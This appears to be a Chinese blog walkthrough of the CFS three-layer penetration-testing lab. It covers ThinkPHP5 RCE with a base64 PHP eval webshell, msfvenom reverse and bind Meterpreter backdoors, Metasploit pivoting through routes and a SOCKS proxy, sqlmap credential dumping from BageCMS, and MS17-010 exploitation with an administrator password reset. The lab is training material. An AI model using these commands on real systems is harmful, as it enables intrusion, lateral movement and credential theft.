[内网渗透]CFS三层靶机渗透

news2025/1/12 18:34:43

文章目录

    • [内网渗透]CFS三层靶机渗透
      • 网络拓扑图
      • 靶机搭建
      • Target1
        • 0x01.nmap主机探活
        • 0x02.端口扫描
        • 0x03.ThinkPHP5 RCE漏洞拿shell
        • 0x04.上传msf后门(reverse_tcp)反向连接拿主机权限
      • 内网渗透
        • Target2
          • (1)路由信息探测
          • (2)msf代理配置
          • (3)利用bagecms-sql注入漏洞,admin登录后台拿shell
          • (4)上传msf后门(bind_tcp)正向连接拿ubuntu主机权限
        • Target3
          • 0x01.添加路由
          • 0x02.利用ms17-010永恒之蓝漏洞拿shell
      • 参考:

[内网渗透]CFS三层靶机渗透

网络拓扑图

image-20230811111948557

三个Target主机的拓扑图如图,攻击机的网段在192.168.1.1/24

  • Target1 Centos7
  • Target2 Ubuntu
  • Target3 Win7

该靶机的渗透流程如下:

通过攻击机kaili192.168.1.129攻击target1的192.168.1.132,target2、3不能连通外网,只能在内网通信。所以需要先渗透target1,然后通过它的vmnet2网卡去攻击target2。拿下target2之后,通过target2做跳板,攻击target3.

靶机搭建

  • kali:192.168.1.129(vmnet1)
  • Target1:192.168.1.132(vmnet1)、192.168.22.130(vmnet2)
  • Target2:192.168.22.128(vmnet2) 、192.168.33.128(vmnet3)
  • Target3:192.168.33.33(vmnet3)

其他不在此赘述,参考:https://blog.csdn.net/qq_61237064/article/details/125602997

Target1

0x01.nmap主机探活

在kaili中使用nmap查看vmnet1网段有哪些主机:

nmap -T4 -sP 192.168.1.1/24

image-20230811114018123

查到一台:192.168.1.132

0x02.端口扫描

nmap -T4 -A -p 1-65535 192.168.1.132

image-20230811114423891

80端口开放

0x03.ThinkPHP5 RCE漏洞拿shell

浏览器访问一下是ThinkPHP5.0版本,有漏洞

image-20230811114551362

我们直接拿工具,检测一下漏洞:

image-20230811114645988

存在漏洞,直接命令执行,写shell进去(此处$_POST被过滤,于是使用base64编码绕过):

echo "PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg==" | base64 -d > x.php

image-20230811114906753

蚁剑连接:

image-20230811115002543

在txt文件发现两个flag

我们执行ifconfig,发现了另一个网段22 192.168.22.130

image-20230811115208212

那么肯定存在内网了

0x04.上传msf后门(reverse_tcp)反向连接拿主机权限

存在内网我们就要使用msf工具了,

首先使用msfevnom生成一个elf的马,这里采取反向连接(Target1来连接kali)

使用uname -a查看一下Target1的系统:

(www:/www/wwwroot/ThinkPHP/public) $ uname -a
Linux localhost.localdomain 3.10.0-1062.1.1.el7.x86_64 #1 SMP Fri Sep 13 22:55:44 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

linux64

然后我们生成一个elf后门马,查看自己的IP地址,并根据自己的IP地址目标靶机的系统类型生成对应的后门文件

# 根据target1操作系统类型生成elf后门,lhost为kali ip
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.129 LPORT=4444 -f elf > shell.elf    

然后在kali中运行监听模块,监听本机4444端口:

# 在kali中运行监听模块
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.129
set lport 4444
exploit

然后我们将elf马上传到target1,设置权限,并执行:

chmod +x shell.elf
./shell.elf

这个时候Target1靶机已经上线msf了:

image-20230811125806597

下面开始内网渗透:

内网渗透

Target2

现在我们不能直接通过nmap去扫描Target2靶机的ip,因为我们网段的设置,kali与Target1是处在同一个网段的主机,我们可以直接扫描到。但是现在扫描的Target2处于内网网段,直接扫扫不到。但是我们知道Target1的vmnet2网卡与Target2处于一个网段,所以我们可以通过Target1的vmnet2网卡来打Target2,因此可以挂上Target1的代理

(1)路由信息探测

我们可以使用msf自带的模块进行信息探测:

  • 探测网络接口的模块(get_local_subnets)
  • 查看路由的模块(autoroute -p)
# 探测子网信息,可以看到存在22网段
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0
Local subnet: 192.168.22.0/255.255.255.0

# 查看路由信息,发现还没有路由
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] No routes have been added yet

**路由:**路由是指路由器从一个接口上收到数据包,根据数据包的目的地址进行定向并转发到另一个接口的过程,就相当于把我们要传输的数据先传输到该路由,再发往目标。

我们可以设置一个路由,然后把我们的请求通过Target1的vmnet1网段发出,然后重定向转发到vmnet2网段,这样kali的msf就可以与22网段(Target2)互通了

于是我们可以设置一个路由:

静态路由配置

MSF 的 autoroute 模块是 MSF 框架中自带的一个路由转发功能,实现过程是 MSF 框架在已经获取的 Meterpreter Shell 的基础上添加一条去往“内网”的路由,直接使用 MSF 去访问原本不能直接访问的内网资源,只要路由可达我们既可使用 MSF 来进行探测了

# 设置路由
run autoroute -s 192.168.22.0/24
# 查看
run autoroute -p
(2)msf代理配置

路由有一个缺陷,它只能在msf建立的这个会话上使用,如果我们新开一个终端使用nmap扫描,还是扫描不到的,所以我们需要设置msf的代理

msf有自己的代理模块 auxiliary/server/socks_proxy

假设现在msf的会话是session1,是建立在Target1的shell上的,建立路由之后可以与22网段通信。那么我们想要通过session1使用工具去攻击22网段,这时该怎么办?

这种情况就需要设置一个代理了,通过这个代理给别人一个端口去连接,然后我们可以使用本机去连接kali的端口,这样就能访问Target2的22网段了

# 先切换到控制台
background
# 配置socks5代理
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set srvhost 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set srvport 1080
msf6 auxiliary(server/socks_proxy) > run

在kali中通过vim /etc/proxychains.conf修改proxychains配置文件:

image-20230811134750046

写入kali的ip和刚刚配置的端口

然后使用nmap探测端口(注意:使用nmap时前面要加上proxychains这样才能使用msf的代理)

proxychains nmap -T4 -p 80 192.168.22.128

image-20230811141654805

80端口开放

我们给浏览器设置一个socks5代理:

image-20230811141826019

访问一下:

image-20230811141851398

是一个bagecms搭建的网站

(3)利用bagecms-sql注入漏洞,admin登录后台拿shell

这里可以使用一个好用的工具SocksCap,这个工具可以给其他工具添加上代理

image-20230811142444730

扫描到robots.txt,告诉了我们admin的路径

#
# robots.txt for BageCMS
#
User-agent: * 
Disallow: /admini/
Disallow: /index.php?r=admini*

信息收集,源码给了hint:SQL注入点:/index.php?r=vul&keyword=1

image-20230811143956269

我们可以直接使用sqlmap跑,但是需要挂上代理,可以使用参数--proxy或kali中前面加上proxychains。我们可以直接指定注入点:-p keyword

# 爆一下数据库名称
proxychains sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" -p keyword --dbs
或
sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" --proxy=socks5://192.168.1.129:1080 -p keyword --dbs --batch
# 爆破 bagecms 库下的表
proxychains sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" -p keyword -D "bagecms" --tables T "bage_admin" --batch
# 爆破 bage_admin 表的字段
proxychains sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" -p keyword -D "bagecms" -T "bage_admin" --columns --batch
# 把 admin的账号密码给 dump出来
proxychains sqlmap -u "http://192.168.22.22/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password --dump
# 测试了--is-dba,不是高权限,那就不尝试--os-shell了

拿到admin的账号和密码 admin:123qwe

登陆后台,拿到flag:

image-20230811145312912

tag/index.php写入马

image-20230811145740912

然后我们使用SocksCap工具挂上代理,打开蚁剑连接:

注意URL:http://192.168.22.128/?r=tag

image-20230811150210541

(4)上传msf后门(bind_tcp)正向连接拿ubuntu主机权限

我们拿到shell之后和前面一样,使用msf生成后门。但是这里有点不同,由于Target2不能出网

所以我们这次只能正向连接,即通过kali去连接Target2

我们在蚁剑查看一下target2的操作系统:

uname -a

image-20230811151354653

可以看到是一个64位的操作系统

因此在kaili生成一个elf正向连接的后门:

# 生成一个正向连接后门(因为内网主机无法直接与本机通信,因此无法建立反向连接,需要本机通过代理连接到目标机)
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > tgt2.elf

上传到target2,并修改权限执行:

chmod +x tgt2.elf
./tgt2.elf

image-20230811151543773

在MSF中开启监听,与Target2建立连接,这里需要注意,上一次代理使用的reverse_tcp是MSF作为监听,让Target1连到我们,而这次代理使用的bind_tcp是Target2作为监听,我们需要连到Target2,这个逻辑正好是相反的

同样,如果我们要用msf 另起一个终端开启监听,这里要注意,msf新开的终端之前的那个终端的配置都用不了。

如果我们这次代理使用的bind_tcp是Target2作为监听,我们要正向连接到内网里的target2

因此,我们不能直接使用msfconsole打开,而是需要使用proxychains打开msf,需要走代理,否则msf访问不到Target2,然后再去连接bind_tcp

这里有个图

img

(其实使用之前那个终端就行,已经配置了代理,我们就可以直接连bind_tcp了)

我们此处演示一下使用proxychains

proxychains msfconsole
# 本机MSF执行命令
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set RHOST 192.168.22.128
set LPORT 3333
run

target2成功上线msf

image-20230811153115294

然后继续进行信息收集,我们可以使用:

# 获取网络接口:
run get_local_subnets
# 添加路由地址:
run autoroute -s 192.168.33.0/24
# 查看路由地址:
run autoroute -p

此处我们还可以使用一种方法:

shell
# 转化为交互式
python -c 'import pty;pty.spawn("/bin/bash");'
# 查看网络信息
ifconfig

image-20230811153551159

看到了一个33网段的ip,还存在内网

Target3

0x01.添加路由

由于我们在Target2(ubuntu)中探测到ubuntu主机 既处在22网段,又处在33网段,所以我们可以重复之前的步骤,增加一个路由,将kali通过代理发往Target2的流量通过路由从22网段重定向到33网段

# 添加指向33网段的路由
run autoroute -s 192.168.33.0/24
# 查看
run autoroute -p

image-20230811154615369

成功添加了路由

nmap扫描一下target3靶机开放的服务

(新开一个终端后,我们需要在这个新开的msf终端上配置一个代理,然后修改/etc/proxychains.conf

image-20230812183101630

root@kali:~# proxychains4 nmap -Pn -sT 192.168.33.33
-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护。
-sT:扫描TCP数据包已建立的连接connect

扫描到开启了445和3389端口

image-20230811173052922

0x02.利用ms17-010永恒之蓝漏洞拿shell

从扫描结果很容易知道这是win7系统,开启445和3389端口

445端口存在ms17-010永恒之蓝漏洞

于是我们可以试着使用msf中的ms17-010打一下:

search ms17-010
use exploit/windows/smb/ms17_010_psexec
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 192.168.33.33
set LPORT 6666
run

成功利用,输出shell进入命令行

image-20230812185355539

我们输出:netstat -ant查看一下有哪些端口:

image-20230812185455305

看到了3389端口,于是可以进行远程桌面连接,

我们先使用net user查看一下有哪些用户,发现有administrator

我们输入:net user administrator 123456修改密码

然后使用SocksCap打开连接远程桌面程序mstsc.exe

(注意要设置代理为新的那个),输入ip:192.168.33.33连接

image-20230812185220492

成功拿下

还有另一种连接方式:使用端口转发

portfwd add -l 7777 -p 3389 -r 192.168.33.33

将192.168.33.33:3389转发到kali的7777端口上,然后直接连接就行:

image-20230812190034722

参考:

https://www.cnblogs.com/1vxyz/p/17080748.html

https://blog.csdn.net/qq_61237064/article/details/125602997

https://teamssix.com/191021-211425.html#toc-heading-9

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/869829.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Air001基于Keil环境点灯和调试输出工程配置

Air001基于Keil环境点灯和调试输出工程配置 📌官方环境搭建教程介绍:https://wiki.luatos.com/chips/air001/Air001-MDK.html🔖本人使用的是基于HAL库环境搭建的。📍SDK开发资源链接:https://gitee.com/openLuat/luato…

私域流量宝工具源码搭建-含详细使用说明

👋私域流量宝致力于为个人、团队提供基于微信私域流量的推广、引流的效率工具。可减轻人力,有效降低资源损失、流量流失的几率。引流宝完全开源,免费,可商用、可任意二次开发。引流宝可以辅助你更好地开展营销活动推广&#xff01…

【Docker系列】push镜像报错问题解决方案

1 问题描述 docker push 报这个错,unknown blob 详细报错内容: Use docker scan to run Snyk tests against images to find vulnerabilities and learn how to fix them The push refers to repository [192.******/*******/*************] 3b3341e9d03…

2498. 青蛙过河 II;2568. 最小无法得到的或值;1954. 收集足够苹果的最小花园周长

2498. 青蛙过河 II 核心思想:这题有点开脑洞,就是如果想让代价最小只能是隔一个石头跳,因为其他方法的路径都会形成比这种方法大的结果,然后我们只需要统计出间隔石头的最大值即可。 2568. 最小无法得到的或值 核心思想&#xf…

【第二阶段】kotlin语言的匿名函数类型推断

1.常规匿名函数写法: 如果使用了":",必须给定参数类型和 返回值类型如下: val meThod:()->Int{}2.匿名函数“”,返回类型推断 使用类型推断“”,根据返回值的类型推断 fun main() {/** 常规匿名函数写法&#xff1a…

2023年最新最全软件测试面试题大全

一、面试基础题 简述测试流程: 1、阅读相关技术文档(如产品PRD、UI设计、产品流程图等)。 2、参加需求评审会议。 3、根据最终确定的需求文档编写测试计划。 4、编写测试用例(等价类划分法、边界值分析法等)。 5、用例评审(…

哈希unordered系列介绍(上)

一.Unordered_map,Unordered_set介绍 在之前我们已经介绍过set,map,multiset等等关联式容器,它们的底层是红黑树进行模拟实现的,在查询时效率可达到 l o g 2 N log_2 N log2​N,即最差情况下需要比较红黑树的高度次,当树中的节点…

【Linux】IP协议——网络层

目录 IP协议 基本概念 IP协议格式 分片与组装 网段划分 特殊的IP地址 IP地址的数量限制 私网IP地址和公网IP地址 路由 路由表生成算法 IP协议 IP协议全称为“网际互连协议(Internet Protocol)”,IP协议是TCP/IP体系中的网络层协议…

【LangChain】Memory

概要 大多数LLM应用都有对话界面。对话的一个重要组成部分是能够引用对话中先前介绍的信息。至少,对话系统应该能够直接访问过去消息的某些窗口。更复杂的系统需要有一个不断更新的世界模型,这使得它能够执行诸如维护有关实体及其关系的信息之类的事情。…

【D3S】REST接口文档自动生成 - 集成smart-doc并同步配置到Torna

目录 一、引言二、maven插件三、smart-doc.json配置四、smart-doc-maven-plugin相关命令五、推送文档到Torna六、通过Maven Profile简化构建 一、引言 D3S(DDD with SpringBoot)为本作者使用DDD过程中开发的框架,目前已可公开查看源码&#…

Object.assign详解

一、Object.assign是什么? Object.assign( )方法用于将所有可枚举属性的值从一个或多个源对象复制到目标对象。它将返回目标对象。 二、用法 Object.assign(target, ...sources) 参数:target ——>目标对象 source ——>源对象 返回值:…

使用生成式 AI 模仿人类行为

推荐:使用 NSDT场景编辑器 助你快速搭建可编辑的3D应用场景 这项研究被 2023 年学习表征国际会议 (ICLR) 接受,该会议致力于推进通常称为深度学习的人工智能分支。 图 1:我们的方法概述。 扩散模型已成为一类强大的生…

【JVM】JVM垃圾收集器

文章目录 什么是JVM垃圾收集器四种垃圾收集器(按类型分)1.串行垃圾收集器(效率低)2.并行垃圾收集器(JDK8默认使用此垃圾回收器)3.CMS(并发)垃圾收集器(只针对老年代垃圾回收的) 什么是JVM垃圾收…

SDR硬件方案

以射频硬件为线索,梳理常见SDR(软件无线电)方案。SDR硬件位于天线和数字信号处理之间,负责把无线电信号数字化,交由主机或者嵌入式系统(FPGA、DSP,MCU)处理。SDR硬件一般包含射频和数…

Python Opencv实践 - 图像缩放

import cv2 as cv import numpy as np import matplotlib.pyplot as pltimg_cat cv.imread("../SampleImages/cat.jpg", cv.IMREAD_COLOR) plt.imshow(img_cat[:,:,::-1])#图像绝对尺寸缩放 #cv.resize(src, dsize[, dst[, fx[, fy[, interpolation]]]]) #指定Size大…

18.3.0:Dynamic Web TWAIN Crack Web 文档扫描 SDK

Dynamic Web TWAIN用于快速部署 Web 应用程序的文档扫描 SDK,文档扫描SDK,,超过 5300 家公司信任 Dynamic Web TWAIN ,因其稳健性和安全性而受到超过 5300 家公司的信赖,Dynamic Web TWAIN 是一款基于浏览器的文档扫描…

微信开发之一键获取标签好友的技术实现

简要描述: 获取标签列表 请求URL: http://域名地址/getContactLabelList 请求方式: POST 请求头Headers: Content-Type:application/jsonAuthorization:login接口返回 参数: 参数名必选…

qtrvsim 使用

qtrvsim 使用 介绍 Qtrvsim 是一个基于 WebAssembly(基于非 js 语言并使得其可以在浏览器中运行)的图形化 RISC-V 微处理器模拟器,给初学者提供了一个实现 RISC-V 架构的渠道。 Developed by the Computer Architectures Education project…

5.2 互联网通信安全

数据参考:CISP官方 目录 一、什么是互联网通信安全二、为什么要关注互联网通信安全三、电子邮件应用安全四、即时通讯应用安全 一、什么是互联网通信安全 1、互联网通信应用的概念 通信的进化史 互联网通信技术(OSI七层模型) 互联网应…

【第二阶段】kotlin的lambda学习

匿名函数lambdm表达式 1.两数相加 fun main() {//匿名函数lambda表达式//两数相加 等价:val addResult:(Int,Int)->String{a,b->"两数相加结果:${ab}"}val addResult{a:Int,b:Int->"两数相加结果${ab}"}println(addResul…